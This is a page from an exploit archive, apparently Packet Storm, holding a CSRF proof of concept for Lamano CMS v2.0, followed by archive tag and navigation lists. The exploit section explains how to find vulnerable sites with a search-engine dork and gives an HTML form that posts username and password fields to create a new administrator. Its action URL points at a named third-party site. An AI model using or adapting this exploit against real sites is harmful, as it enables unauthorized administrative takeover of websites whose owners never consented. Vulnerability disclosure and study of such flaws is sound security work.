Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
Change Mirror[11] Download[12]
| # Title : Lamano CMS v2.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |
| # Vendor : http://www.lamano.lu/ |
| # Dork : © 2018 Lamano by easysolutions |
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] The following html code create a new admin .
[+] Go to the line 8.
[+] Set the target site link Save changes and apply .
[+] infected file : admin.php
[+] .
[+] save code as poc.html .
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://www.w3.org/2005/10/profile">
<form action="https://www.sylviebecker." method="POST">
<table class="modif_utilisateur" border="0" cellpadding="3" cellspacing="0" width="350">
<td class="tah11" colspan="2" align="center"><B>Nouvel utilisateur : </B></td>
<td class="tah11" align="right">Nom d'utilisateur :</td>
<td class="tah11" align="left"><input type="text" name="user" class="form-control" value=""></td>
<td class="tah11" align="right">Mot de passe : </td>
<td class="tah11" align="left"><input type="text" name="pass" class="form-control" value=""></td>
<td class="tah11" colspan="2" align="center"><input class="btn btn-lg btn-primary" type="submit" value="Ajouter"></td>
Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
File Tags
- ActiveX[18] (932)
- Advisory[19] (82,296)
- Arbitrary[20] (16,271)
- BBS[21] (2,859)
- Bypass[22] (1,752)
- CGI[23] (1,028)
- Code Execution[24] (7,318)
- Conference[25] (680)
- Cracker[26] (843)
- CSRF[27] (3,350)
- DoS[28] (23,561)
- Encryption[29] (2,371)
- Exploit[30] (52,122)
- File Inclusion[31] (4,230)
- File Upload[32] (977)
- Firewall[33] (821)
- Info Disclosure[34] (2,794)
- Intrusion Detection[35] (894)
- Java[36] (3,049)
- JavaScript[37] (860)
- Kernel[38] (6,746)
- Local[39] (14,509)
- Magazine[40] (586)
- Overflow[41] (12,741)
- Perl[42] (1,423)
- PHP[43] (5,155)
- Proof of Concept[44] (2,344)
- Protocol[45] (3,612)
- Python[46] (1,537)
- Remote[47] (30,885)
- Root[48] (3,592)
- Rootkit[49] (509)
- Ruby[50] (612)
- Scanner[51] (1,641)
- Security Tool[52] (7,898)
- Shell[53] (3,196)
- Shellcode[54] (1,216)
- Sniffer[55] (895)
- Spoof[56] (2,209)
- SQL Injection[57] (16,418)
- TCP[58] (2,411)
- Trojan[59] (687)
- UDP[60] (894)
- Virus[61] (666)
- Vulnerability[62] (31,847)
- Web[63] (9,710)
- Whitepaper[64] (3,751)
- x86[65] (963)
- XSS[66] (18,002)
- Other[67]
File Archives
- September 2023[68]
- August 2023[69]
- July 2023[70]
- June 2023[71]
- May 2023[72]
- April 2023[73]
- March 2023[74]
- February 2023[75]
- January 2023[76]
- December 2022[77]
- November 2022[78]
- October 2022[79]
- Older[80]
- AIX[81] (428)
- Apple[82] (2,008)
- BSD[83] (373)
- CentOS[84] (57)
- Cisco[85] (1,925)
- Debian[86] (6,841)
- Fedora[87] (1,692)
- FreeBSD[88] (1,244)
- Gentoo[89] (4,329)
- HPUX[90] (879)
- iOS[91] (353)
- iPhone[92] (108)
- IRIX[93] (220)
- Juniper[94] (68)
- Linux[95] (46,793)
- Mac OS X[96] (687)
- Mandriva[97] (3,105)
- NetBSD[98] (256)
- OpenBSD[99] (485)
- RedHat[100] (13,910)
- Slackware[101] (941)
- Solaris[102] (1,610)
- SUSE[103] (1,444)
- Ubuntu[104] (8,930)
- UNIX[105] (9,309)
- UnixWare[106] (186)
- Windows[107] (6,587)
- Other[108]
- Services
- Security Services[119]
- Hosting By
- Rokasec[120]